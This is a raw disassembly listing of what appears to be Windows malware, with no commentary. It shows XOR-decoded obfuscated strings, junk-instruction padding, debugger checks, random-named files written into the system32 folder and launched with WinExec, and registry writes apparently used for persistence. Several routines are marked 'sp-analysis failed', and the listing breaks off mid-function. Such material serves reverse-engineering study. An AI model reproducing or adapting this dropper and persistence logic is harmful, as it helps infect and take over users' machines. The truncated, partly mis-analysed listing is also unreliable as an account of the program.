var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 118h
push esi
push edi
lea edi, [ebp+var_10B]
lea esi, aS ; "S=~/ "
mov ecx, 3
rep movsw
lea edi, [ebp+var_112]
lea esi, aW4 ; "='W#4~"
mov ecx, 7
rep movsb
lea edi, [ebp+var_115]
lea esi, a0z ; "0Z"
mov ecx, 3
rep movsb
lea eax, [ebp+var_105]
push eax
push [ebp+arg_0]
call sub_4033FD
mov [ebp+var_1], 0C7h
movzx eax, [ebp+var_1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1], al
push 2
push offset word_447556
call sub_40336C
push eax
lea edi, [ebp+var_105]
push edi
call sub_40C9F8
add esp, 18h
call sub_40C5D8 ; IsDebuggerPresent
lea eax, [ebp+var_105]
push eax
call sub_40C584 ; GlobalAddAtomA
pop edi
pop esi
leave
retn
sub_4034C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40355C proc near ; CODE XREF: sub_409883+25D�p
; sub_409883+2FE�p ...
var_111 = byte ptr -111h
var_110 = byte ptr -110h
var_108 = word ptr -108h
var_106 = byte ptr -106h
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 114h
push ebx
push esi
push edi
mov [ebp+var_2], 41Ch
sub [ebp+var_2], 0DBFh
lea edi, [ebp+var_110]
lea esi, aPfoebK ; "pFoE#K"
movsd
movsd
call sub_40C554 ; GetVersion
lea eax, [ebp+var_106]
push eax
push [ebp+arg_0]
call sub_4033FD
mov ebx, 7AF5h
add ebx, 6FB2h
push 2
push offset word_447556
call sub_40336C
push eax
lea edi, [ebp+var_106]
push edi
call sub_40C9F8
add esp, 18h
loc_4035BD: ; CODE XREF: sub_40355C+A8�j
lea eax, [ebp+var_106]
push eax
call sub_40C59C ; GlobalFindAtomA
mov edi, eax
mov [ebp+var_108], di
call sub_40C4B8 ; GetCurrentProcessId
cmp [ebp+var_108], 0
jz short loc_403606
call sub_40C554 ; GetVersion
movzx eax, [ebp+var_108]
push eax
call sub_40C590 ; GlobalDeleteAtom
lea edi, [ebp+var_111]
lea esi, byte_43D185
xor ecx, ecx
inc ecx
rep movsb
jmp short loc_4035BD
; ---------------------------------------------------------------------------
loc_403606: ; CODE XREF: sub_40355C+83�j
pop edi
pop esi
pop ebx
leave
retn
sub_40355C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40360B proc near ; CODE XREF: sub_40369B+A9�p
; sub_403780+35�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_43D190
lea eax, ds:40E0E0h[eax]
push eax
call sub_40C998
add esp, 0Ch
xor edi, edi
jmp short loc_403647
; ---------------------------------------------------------------------------
loc_403630: ; CODE XREF: sub_40360B+3E�j
mov eax, dword_43D190
add eax, edi
lea eax, ds:40E0E0h[eax]
movsx edx, byte ptr [eax]
xor edx, 3Fh
mov [eax], dl
inc edi
loc_403647: ; CODE XREF: sub_40360B+23�j
cmp edi, esi
jl short loc_403630
mov eax, dword_43D190
add eax, esi
mov byte ptr ds:dword_40E0E0[eax], 0
xor edi, edi
mov edi, dword_43D190
add dword_43D190, 3
mov eax, dword_43D190
lea eax, [eax+esi+2]
mov dword_43D190, eax
add dword_43D190, 3
cmp dword_43D190, 0DC1h
jle short loc_403691
and dword_43D190, 0
loc_403691: ; CODE XREF: sub_40360B+7D�j
lea eax, dword_40E0E0[edi]
pop edi
pop esi
pop ebp
retn
sub_40360B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40369B proc near ; CODE XREF: sub_403780+42�p
var_40 = byte ptr -40h
var_3D = byte ptr -3Dh
var_3C = dword ptr -3Ch
var_35 = byte ptr -35h
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 40h
push ebx
push esi
push edi
mov ebx, [ebp+arg_4]
call sub_40C4E8 ; RtlGetLastWin32Error
lea edi, [ebp+var_40]
lea esi, byte_43D194
mov ecx, 3
rep movsb
call sub_40C4C4 ; GetCurrentThreadId
mov eax, 5
sub eax, dword_43D188
push eax
lea eax, [ebp+var_35]
push eax
push [ebp+arg_0]
call sub_40C944
add esp, 0Ch
mov [ebp+var_3D], 0C4h
add [ebp+var_3D], 7
lea ecx, [ebp+var_35]
or eax, 0FFFFFFFFh
loc_4036EA: ; CODE XREF: sub_40369B+54�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4036EA
mov edx, eax
mov [ebp+var_2], dl
mov [ebp+var_1], 0
jmp short loc_403712
; ---------------------------------------------------------------------------
loc_4036FC: ; CODE XREF: sub_40369B+81�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
sub edx, eax
dec edx
mov al, [ebp+eax+var_35]
mov [ebx+edx], al
add [ebp+var_1], 1
loc_403712: ; CODE XREF: sub_40369B+5F�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
cmp eax, edx
jl short loc_4036FC
mov [ebp+var_3C], 57FAh
mov eax, [ebp+var_3C]
mov edx, eax
add edx, eax
mov [ebp+var_3C], edx
movzx eax, [ebp+var_2]
mov byte ptr [ebx+eax], 0
mov [ebp+var_3], 0
jmp short loc_403757
; ---------------------------------------------------------------------------
loc_40373D: ; CODE XREF: sub_40369B+CD�j
push 1
push offset byte_447554
call sub_40360B
push eax
push ebx
call sub_40C9F8
add esp, 10h
add [ebp+var_3], 1
loc_403757: ; CODE XREF: sub_40369B+A0�j
movzx eax, [ebp+var_3]
mov edx, 20h
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jl short loc_40373D
call sub_40C518 ; GetProcessHeap
push [ebp+arg_8]
push ebx
call sub_40C9F8
add esp, 8
pop edi
pop esi
pop ebx
leave
retn
sub_40369B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403780 proc near ; CODE XREF: sub_40A74E+605�p
var_3D = dword ptr -3Dh
var_39 = byte ptr -39h
var_36 = byte ptr -36h
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 40h
push esi
push edi
mov [ebp+var_2], 6F8Fh
sub [ebp+var_2], 15BEh
lea edi, [ebp+var_39]
lea esi, byte_43D197
mov ecx, 3
rep movsb
mov [ebp+var_4], 0EF0h
inc [ebp+var_4]
push 1
push offset word_447552
call sub_40360B
push eax
lea edi, [ebp+var_36]
push edi
push [ebp+arg_0]
call sub_40369B
add esp, 14h
lea eax, [ebp+var_36]
push eax
call sub_40C584 ; GlobalAddAtomA
mov eax, dword_43D19A
mov [ebp+var_3D], eax
pop edi
pop esi
leave
retn
sub_403780 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4037DF proc near ; CODE XREF: sub_403883+54�p
; .text:00403957�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_43D1A8
lea eax, ds:40F5A0h[eax]
push eax
call sub_40C998
add esp, 0Ch
mov [ebp+var_4], 399h
xor edi, edi
jmp short loc_403827
; ---------------------------------------------------------------------------
loc_40380D: ; CODE XREF: sub_4037DF+4A�j
mov eax, dword_43D1A8
add eax, edi
lea eax, ds:40F5A0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0DFh
mov [eax], dl
inc edi
loc_403827: ; CODE XREF: sub_4037DF+2C�j
cmp edi, esi
jl short loc_40380D
mov [ebp+var_8], 35Ch
mov eax, dword_43D1A8
add eax, esi
mov byte ptr ds:dword_40F5A0[eax], 0
xor edi, edi
mov edi, dword_43D1A8
add dword_43D1A8, 3
mov eax, dword_43D1A8
add eax, 4
add eax, esi
mov dword_43D1A8, eax
add dword_43D1A8, 2
cmp dword_43D1A8, 0DB1h
jle short loc_403879
and dword_43D1A8, 0
loc_403879: ; CODE XREF: sub_4037DF+91�j
lea eax, dword_40F5A0[edi]
pop edi
pop esi
leave
retn
sub_4037DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403883 proc near ; CODE XREF: sub_40A74E+6A1�p
; sub_40A74E+6BF�p
var_10A = word ptr -10Ah
var_108 = byte ptr -108h
var_105 = byte ptr -105h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10Ch
push esi
push edi
call sub_40C4B8 ; GetCurrentProcessId
lea edi, [ebp+var_108]
lea esi, byte_43D1AC
mov ecx, 3
rep movsb
mov ax, word_43D1AF
mov [ebp+var_10A], ax
push [ebp+arg_0]
lea eax, [ebp+var_104]
push eax
call sub_40C9D4
mov [ebp+var_105], 78h
sub [ebp+var_105], 4Dh
push 1
push offset byte_447550
call sub_4037DF
push eax
lea edi, [ebp+var_104]
push edi
call sub_40C9F8
call sub_40C4C4 ; GetCurrentThreadId
push [ebp+arg_4]
lea eax, [ebp+var_104]
push eax
call sub_40C9F8
add esp, 20h
call sub_40C4B8 ; GetCurrentProcessId
lea eax, [ebp+var_104]
push eax
call sub_40C584 ; GlobalAddAtomA
pop edi
pop esi
leave
retn
sub_403883 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 114h
push esi
push edi
lea edi, [ebp-113h]
lea esi, aAluvia ; "LUVIa"
mov ecx, 7
rep movsb
mov byte ptr [ebp-105h], 80h
sub byte ptr [ebp-105h], 49h
push dword ptr [ebp+8]
lea eax, [ebp-104h]
push eax
call sub_40C9D4
push 1
push offset byte_447550
call sub_4037DF
push eax
lea edi, [ebp-104h]
push edi
call sub_40C9F8
mov word ptr [ebp-108h], 7ECh
sub word ptr [ebp-108h], 4996h
push dword ptr [ebp+0Ch]
lea eax, [ebp-104h]
push eax
call sub_40C9F8
add esp, 20h
call sub_40C518 ; GetProcessHeap
loc_403992: ; CODE XREF: .text:004039E0�j
lea eax, [ebp-104h]
push eax
call sub_40C59C ; GlobalFindAtomA
mov edi, eax
mov [ebp-10Ah], di
mov word ptr [ebp-10Ch], 38C0h
movzx eax, word ptr [ebp-10Ch]
imul eax, 39E2h
mov [ebp-10Ch], ax
cmp word ptr [ebp-10Ah], 0
jz short loc_4039E2
movzx eax, word ptr [ebp-10Ah]
push eax
call sub_40C590 ; GlobalDeleteAtom
call sub_40C5D8 ; IsDebuggerPresent
jmp short loc_403992
; ---------------------------------------------------------------------------
loc_4039E2: ; CODE XREF: .text:004039CC�j
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4039E6 proc near ; CODE XREF: sub_403A7B+BF�p
; sub_403B8E+5B�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_43D1C0
lea eax, ds:41EB80h[eax]
push eax
call sub_40C998
add esp, 0Ch
xor edi, edi
jmp short loc_403A23
; ---------------------------------------------------------------------------
loc_403A0C: ; CODE XREF: sub_4039E6+3F�j
mov eax, dword_43D1C0
add eax, edi
lea eax, ds:41EB80h[eax]
movsx edx, byte ptr [eax]
xor edx, 5Dh
mov [eax], dl
inc edi
loc_403A23: ; CODE XREF: sub_4039E6+24�j
cmp edi, esi
jl short loc_403A0C
mov [ebp+var_4], 229h
mov eax, dword_43D1C0
add eax, esi
mov byte ptr ds:dword_41EB80[eax], 0
mov edi, dword_43D1C0
add dword_43D1C0, 2
mov eax, dword_43D1C0
lea eax, [eax+esi+5]
mov dword_43D1C0, eax
inc dword_43D1C0
cmp dword_43D1C0, 0DB0h
jle short loc_403A71
and dword_43D1C0, 0
loc_403A71: ; CODE XREF: sub_4039E6+82�j
lea eax, dword_41EB80[edi]
pop edi
pop esi
leave
retn
sub_4039E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A7B proc near ; CODE XREF: sub_403B8E+30�p
; sub_403D18+146�p ...
var_1024 = dword ptr -1024h
var_101D = byte ptr -101Dh
var_1018 = byte ptr -1018h
var_1015 = byte ptr -1015h
var_1010 = dword ptr -1010h
var_100A = word ptr -100Ah
var_1008 = dword ptr -1008h
var_1003 = byte ptr -1003h
var_1000 = byte ptr -1000h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1024h
call sub_40C43C
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
lea edi, [ebp+var_1015]
lea esi, a6Df ; "6~dF"
mov ecx, 5
rep movsb
lea edi, [ebp+var_1018]
lea esi, aU ; "U#"
mov ecx, 3
rep movsb
lea edi, [ebp+var_101D]
lea esi, aN ; "N |$"
mov ecx, 5
rep movsb
push 0FFFh
lea eax, [ebp+var_1003]
push eax
call sub_40C524 ; GetSystemDirectoryA
mov [ebp+var_1008], 7ED1h
mov eax, 1108h
mul [ebp+var_1008]
mov [ebp+var_1024], eax
mov [ebp+var_1008], eax
mov [ebp+var_1000], 0
push 0FFFh
lea eax, [ebp+var_1003]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_1010]
push eax
push 0FFFh
lea eax, [ebp+var_1003]
push eax
lea eax, [ebp+var_1003]
push eax
call sub_40C56C ; GetVolumeInformationA
push 4
push offset byte_44754B
call sub_4039E6
push [ebp+var_1010]
push eax
push ebx
call sub_40C9D4
add esp, 14h
call sub_40C518 ; GetProcessHeap
and [ebp+var_4], 0
loc_403B58: ; CODE XREF: sub_403A7B+FA�j
mov eax, [ebp+var_4]
mov al, [ebx+eax]
cmp al, 41h
jge short loc_403B6E
cmp al, 30h
jle short loc_403B6E
mov eax, [ebp+var_4]
add eax, ebx
add byte ptr [eax], 11h
loc_403B6E: ; CODE XREF: sub_403A7B+E5�j
; sub_403A7B+E9�j
inc [ebp+var_4]
cmp [ebp+var_4], 8
jb short loc_403B58
mov [ebp+var_100A], 66EDh
add [ebp+var_100A], 4344h
pop edi
pop esi
pop ebx
leave
retn
sub_403A7B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B8E proc near ; CODE XREF: sub_40A74E+754�p
var_293 = byte ptr -293h
var_28C = byte ptr -28Ch
var_289 = byte ptr -289h
var_284 = byte ptr -284h
var_27F = byte ptr -27Fh
var_279 = byte ptr -279h
var_276 = dword ptr -276h
var_272 = byte ptr -272h
var_26C = byte ptr -26Ch
var_267 = byte ptr -267h
var_163 = byte ptr -163h
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
sub esp, 294h
push ebx
push esi
push edi
call sub_40C518 ; GetProcessHeap
lea edi, [ebp+var_26C]
lea esi, aWdg ; "wD "
mov ecx, 5
rep movsb
call sub_40C554 ; GetVersion
lea eax, [ebp+var_163]
push eax
call sub_403A7B
lea edi, [ebp+var_272]
lea esi, aQ85o ; "Q/85O"
mov ecx, 3
rep movsw
mov eax, dword_4421FE
mov [ebp+var_276], eax
push 9
push offset byte_447541
call sub_4039E6
lea edi, [ebp+var_163]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push eax
lea edi, [ebp+var_FF]
push edi
call sub_40C9D4
lea edi, [ebp+var_279]
lea esi, word_442202
mov ecx, 3
rep movsb
lea eax, [ebp+var_FF]
push eax
call sub_4034C6
lea edi, [ebp+var_27F]
lea esi, a4kzsb ; "4kzsB"
mov ecx, 3
rep movsw
push 0
push 0
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_FF]
push eax
call sub_40C650 ; CreateFileA
mov ebx, eax
call sub_40C4C4 ; GetCurrentThreadId
push 0
lea eax, [ebp+var_284]
push eax
push 3621h
push offset byte_43EBC5
push ebx
call sub_40C6C8 ; WriteFile
lea edi, [ebp+var_289]
lea esi, aOmy ; "OmY "
mov ecx, 5
rep movsb
push ebx
call sub_40C530 ; CloseHandle
call sub_40C4B8 ; GetCurrentProcessId
lea edi, [ebp+var_28C]
lea esi, aK ; "%K"
mov ecx, 3
rep movsb
push 104h
lea eax, [ebp+var_267]
push eax
push 0
call sub_40C4F4 ; GetModuleFileNameA
call sub_40C4E8 ; RtlGetLastWin32Error
push 1
push offset byte_44753F
call sub_4039E6
push eax
lea edi, [ebp+var_FF]
push edi
call sub_40C9F8
lea edi, [ebp+var_293]
lea esi, aGiyA9 ; "Iy~9"
mov ecx, 7
rep movsb
lea eax, [ebp+var_267]
push eax
lea eax, [ebp+var_FF]
push eax
call sub_40C9F8
add esp, 38h
call sub_40C548 ; GetTickCount
push 0
lea eax, [ebp+var_FF]
push eax
call sub_40C6BC ; WinExec
pop edi
pop esi
pop ebx
leave
retn
sub_403B8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403D18 proc near ; CODE XREF: sub_40A74E+2CA�p
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_300 = dword ptr -300h
var_2FC = dword ptr -2FCh
var_2F7 = byte ptr -2F7h
var_2F0 = byte ptr -2F0h
var_2EB = byte ptr -2EBh
var_2E6 = byte ptr -2E6h
var_2DE = dword ptr -2DEh
var_2DA = byte ptr -2DAh
var_2D7 = byte ptr -2D7h
var_2D0 = byte ptr -2D0h
var_26C = word ptr -26Ch
var_26A = byte ptr -26Ah
var_269 = byte ptr -269h
var_205 = byte ptr -205h
var_101 = byte ptr -101h
var_FB = byte ptr -0FBh
var_FA = byte ptr -0FAh
var_F9 = byte ptr -0F9h
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 31Ch
push ebx
push esi
push edi
call sub_40C4C4 ; GetCurrentThreadId
lea edi, [ebp+var_2D7]
lea esi, aIwKa ; "IW' KA"
mov ecx, 7
rep movsb
mov ebx, 56F2h
inc ebx
push 26h
push offset dword_447518
call sub_4039E6
mov [ebp+var_2FC], eax
call sub_40C9BC
mov [ebp+var_300], eax
call sub_40C9BC
mov [ebp+var_304], eax
call sub_40C9BC
mov [ebp+var_308], eax
call sub_40C9BC
mov [ebp+var_30C], eax
call sub_40C9BC
mov [ebp+var_310], eax
call sub_40C9BC
mov [ebp+var_314], eax
call sub_40C9BC
mov [ebp+var_318], eax
call sub_40C9BC
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_318]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_314]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_310]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_30C]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_308]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_304]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_300]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_2FC]
push edi
lea edi, [ebp+var_269]
push edi
call sub_40C9D4
lea edi, [ebp+var_2DA]
lea esi, aR6 ; "R6"
mov ecx, 3
rep movsb
mov eax, dword_442224
mov [ebp+var_2DE], eax
lea eax, [ebp+var_2D0]
push eax
call sub_403A7B
add esp, 34h
mov [ebp+var_26A], 10h
add [ebp+var_26A], 0B5h
lea edi, [ebp+var_2E6]
lea esi, aZ0lnyh? ; "Z0LNYh?"
movsd
movsd
lea edi, [ebp+var_2EB]
lea esi, aVb6l ; "v6l"
mov ecx, 5
rep movsb
call sub_40C9BC
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov edi, eax
add edi, 41h
mov edx, edi
mov [ebp+var_101], dl
mov [ebp+var_26C], 38B2h
add [ebp+var_26C], 66CAh
mov [ebp+var_1], 1
jmp short loc_403F04
; ---------------------------------------------------------------------------
loc_403ED4: ; CODE XREF: sub_403D18+1F1�j
call sub_40C9BC
movzx edi, [ebp+var_1]
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov esi, eax
add esi, 61h
mov edx, esi
mov [ebp+edi+var_101], dl
add [ebp+var_1], 1
loc_403F04: ; CODE XREF: sub_403D18+1BA�j
mov al, [ebp+var_1]
cmp al, 8
jbe short loc_403ED4
call sub_40C518 ; GetProcessHeap
mov [ebp+var_F9], 0
call sub_40C9BC
mov edx, eax
test dl, 1
jnz short loc_403F4A
call sub_40C4E8 ; RtlGetLastWin32Error
mov [ebp+var_FB], 33h
mov [ebp+var_31C], 38ADh
add [ebp+var_31C], 3EBEh
mov [ebp+var_FA], 32h
loc_403F4A: ; CODE XREF: sub_403D18+209�j
push 9
push offset word_44750E
call sub_4039E6
lea edi, [ebp+var_101]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push eax
lea edi, [ebp+var_205]
push edi
call sub_40C9D4
call sub_40C518 ; GetProcessHeap
lea eax, [ebp+var_205]
push eax
call sub_4034C6
push 0
push 0
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_205]
push eax
call sub_40C650 ; CreateFileA
mov ebx, eax
push [ebp+arg_0]
mov eax, offset aNdecjhdm ; "Ndecjhdm"
push eax
call sub_40C9D4
call sub_40C5D8 ; IsDebuggerPresent
push 0
lea eax, [ebp+var_2F0]
push eax
push 1A01h
push offset dword_43D1C4
push ebx
call sub_40C6C8 ; WriteFile
call sub_40C4B8 ; GetCurrentProcessId
push ebx
call sub_40C530 ; CloseHandle
call sub_40C548 ; GetTickCount
push 17h
push offset word_4474F6
call sub_4039E6
lea edi, [ebp+var_269]
push edi
push eax
lea edi, [ebp+var_101]
push edi
call sub_40C9D4
call sub_40C5D8 ; IsDebuggerPresent
lea eax, [ebp+var_205]
push eax
push offset byte_4474F5
lea eax, [ebp+var_101]
loc_404010: ; DATA XREF: .data:0043F155�w
; .data:0043F16F�w ...
push eax
push 80000000h ; DATA XREF: .data:0043F23E�w
call sub_40409A
lea edi, [ebp+var_2F7] ; DATA XREF: .data:0043F238�r
lea esi, aEa0I ; DATA XREF: .data:0043F232�r
; "Ea#0 I"
mov ecx, 7 ; DATA XREF: .data:0043F22C�r
loc_40402C: ; DATA XREF: .data:loc_43F1BD�r
; .data:loc_43F1CD�r
rep movsb
push 0Eh
loc_404030: ; DATA XREF: .data:0043F0C1�w
; .data:0043F0CB�w ...
push offset word_4474E6
call sub_4039E6 ; DATA XREF: .data:0043F0D3�w
mov [ebp+var_31C], eax ; DATA XREF: .data:0043F0E0�o
; .data:0043F0EE�o
push 9
push offset dword_4474DC
call sub_4039E6
push eax
mov edi, [ebp+var_31C]
push edi
lea edi, [ebp+var_101]
push edi
push 80000000h
call sub_40409A
call sub_40C4B8 ; GetCurrentProcessId
push 45h
push offset word_447496
call sub_4039E6
lea edi, [ebp+var_269]
push edi
lea edi, [ebp+var_2D0]
push edi
push eax
push 80000002h
call sub_40409A ; DATA XREF: .data:0043F070�w
add esp, 80h ; DATA XREF: .data:0043F075�w
; .data:0043F091�w ...
pop edi
pop esi
pop ebx
sub_403D18 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404098 proc near ; DATA XREF: .data:loc_43F4D9�o
; .data:0043F535�o ...
leave
retn
sub_404098 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40409A proc near ; CODE XREF: sub_403D18+2FE�p
; sub_403D18+348�p ...
var_B = byte ptr -0Bh
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov ebx, [ebp+arg_C]
call sub_40C4B8 ; DATA XREF: sub_43F64C+C�o
inc dword_43C230
lea edi, [ebp+var_B]
lea esi, aN_0 ; "N,"
sub_40409A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4040BA proc near ; DATA XREF: sub_43F64C+1C�o
mov ecx, 3
sub_4040BA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4040BF proc near ; DATA XREF: .data:0043FE14�o
rep movsb
and dword ptr [ebp-4], 0
lea eax, [ebp-8]
push eax
lea eax, [ebp-4]
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40C8C0 ; RegCreateKeyExA
call sub_40C518 ; GetProcessHeap
mov ecx, ebx
or eax, 0FFFFFFFFh
loc_4040EF: ; CODE XREF: sub_4040BF+35�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4040EF
mov [ebp-8], eax
push dword ptr [ebp-8]
push ebx
push 1
push 0
push dword ptr [ebp+10h]
push dword ptr [ebp-4]
call sub_40C8F0 ; RegSetValueExA
lea edi, [ebp-0Ch]
lea esi, byte_44223F
mov ecx, 1
rep movsb
push dword ptr [ebp-4]
call sub_40C8CC ; RegCloseKey
pop edi
pop esi
pop ebx
leave
retn
sub_4040BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404129 proc near ; CODE XREF: sub_4041B6+B5�p
; sub_4041B6+D5�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 163h
push esi
push [ebp+arg_0]
mov eax, dword_442248
lea eax, ds:411B80h[eax]
push eax
call sub_40C998
add esp, 0Ch
xor edi, edi
jmp short loc_404170
; ---------------------------------------------------------------------------
loc_404156: ; CODE XREF: sub_404129+49�j
mov eax, dword_442248
add eax, edi
lea eax, ds:411B80h[eax]
movsx edx, byte ptr [eax]
xor edx, 0E0h
mov [eax], dl
inc edi
loc_404170: ; CODE XREF: sub_404129+2B�j
cmp edi, esi
jl short loc_404156
mov eax, dword_442248
add eax, esi
mov byte ptr ds:dword_411B80[eax], 0
mov edi, dword_442248
add dword_442248, 2
mov eax, dword_442248
lea eax, [eax+esi+6]
mov dword_442248, eax
cmp eax, 0DF7h
jle short loc_4041AC
and dword_442248, 0
loc_4041AC: ; CODE XREF: sub_404129+7A�j
lea eax, dword_411B80[edi]
pop edi
pop esi
leave
retn
sub_404129 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4041B6 proc near ; CODE XREF: sub_40A74E+308�p
var_14A4 = byte ptr -14A4h
var_14A0 = byte ptr -14A0h
var_149C = byte ptr -149Ch
var_1497 = byte ptr -1497h
var_1391 = byte ptr -1391h
var_1390 = dword ptr -1390h
var_1380 = dword ptr -1380h
var_12FC = byte ptr -12FCh
var_11FD = byte ptr -11FDh
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
mov eax, 14B4h
call sub_40C43C
push ebx
push esi
push edi
lea edi, [ebp+var_149C]
lea esi, aGxK_0 ; "gx%K"
mov ecx, 5
rep movsb
lea edi, [ebp-149Fh]
lea esi, aJ ; "&j"
mov ecx, 3
rep movsb
lea edi, [ebp+var_14A4]
lea esi, aLkw_0 ; "'lkW"
mov ecx, 5
rep movsb
push 0FFh
lea eax, [ebp+var_12FC]
push eax
push 0
call sub_40C4F4 ; GetModuleFileNameA
call sub_40C5D8 ; IsDebuggerPresent
mov [ebp+var_1390], 94h
call sub_40C4B8 ; GetCurrentProcessId
lea eax, [ebp+var_1390]
push eax
call sub_40C560 ; GetVersionExA
mov [ebp+var_1391], 21h
add [ebp+var_1391], 1
cmp [ebp+var_1380], 2
jnz short loc_4042C5
call sub_40C5D8 ; IsDebuggerPresent
push 0FFh
lea eax, [ebp+var_FF]
push eax
call sub_40C524 ; GetSystemDirectoryA
call sub_40C4E8 ; RtlGetLastWin32Error
push 0Fh
push offset aUSumjdmofVbf ; "œ"
call sub_404129
lea edi, [ebp+var_FF]
push edi
push eax
lea edi, [ebp+var_11FD]
push edi
call sub_40C9D4
push 0Ah
push offset aUGndRij ; "œΐ"
call sub_404129
lea edi, [ebp+var_FF]
push edi
push eax
lea edi, [ebp+var_1497]
push edi
call sub_40C9D4
push 8
push offset aGndEse ; "΅"
call sub_404129
push eax
lea edi, [ebp+var_FF]
push edi
call sub_40C9F8
add esp, 38h
jmp loc_40434F
; ---------------------------------------------------------------------------
loc_4042C5: ; CODE XREF: sub_4041B6+91�j
call sub_40C518 ; GetProcessHeap
push 0FFh
lea eax, [ebp+var_FF]
push eax
call sub_40C578 ; GetWindowsDirectoryA
call sub_40C4C4 ; GetCurrentThreadId
push 0Fh
push offset aUSumjdmSVbf ; "œ٘"
call sub_404129
lea edi, [ebp+var_FF]
push edi
push eax
lea edi, [ebp+var_11FD]
push edi
call sub_40C9D4
push 0Eh
push offset aUGpnnbodRij ; "œΐ"
call sub_404129
lea edi, [ebp+var_FF]
push edi
sub_4041B6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404313 proc near ; DATA XREF: sub_43F74D+1E1�o
push eax
lea edi, [ebp-1497h]
push edi
call sub_40C9D4
mov byte ptr [ebp-14AAh], 0AAh
add byte ptr [ebp-14AAh], 1
push 0Ch
push offset aGpnnbodGpn ; ""
call sub_404129
push eax
lea edi, [ebp-0FFh]
push edi
